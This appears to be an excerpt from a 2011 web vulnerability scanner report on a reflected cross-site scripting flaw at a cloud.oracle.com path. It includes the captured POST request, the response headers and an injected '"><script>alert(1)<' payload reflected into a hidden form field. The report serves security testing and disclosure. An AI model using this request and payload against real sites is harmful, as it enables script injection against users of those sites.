1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | https://cloud.oracle.com |
Path: | /mycloud/wwv_flow.accept |
POST /mycloud/wwv_flow.accept HTTP/1.1 Host: cloud.oracle.com Connection: keep-alive Content-Length: 436 Cache-Control: max-age=0 Origin: https://cloud.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Content-Type: application/x-www-form Accept: text/html,application Referer: https://cloud.oracle.com Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWV_PUBLIC_SESSION_5001 p_flow_id=5003&p_flow ...[SNIP]... g_names=77163016753299379 |
HTTP/1.1 200 OK Server: Oracle-Application-Server X-ORACLE-IGNORE: IGNORE X-ORACLE-IGNORE: IGNORE X-ORACLE-IGNORE: IGNORE X-ORACLE-IGNORE: IGNORE X-Powered-By: Servlet/2.5 JSP/2.1 X-Frame-Options: DENY Content-Type: text/html; charset=utf-8 Content-Language: en Vary: Accept-Encoding Content-Length: 19604 Date: Mon, 17 Oct 2011 01:45:33 GMT Connection: keep-alive Set-Cookie: BIGipServerwww_cloud <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="ie6"> <![endif]--> <!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]--> <!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]--> <!--[if IE 9 ]> ...[SNIP]... <input type="hidden" name="p_md5_checksum" value="7de15"><script>alert(1)< ...[SNIP]... |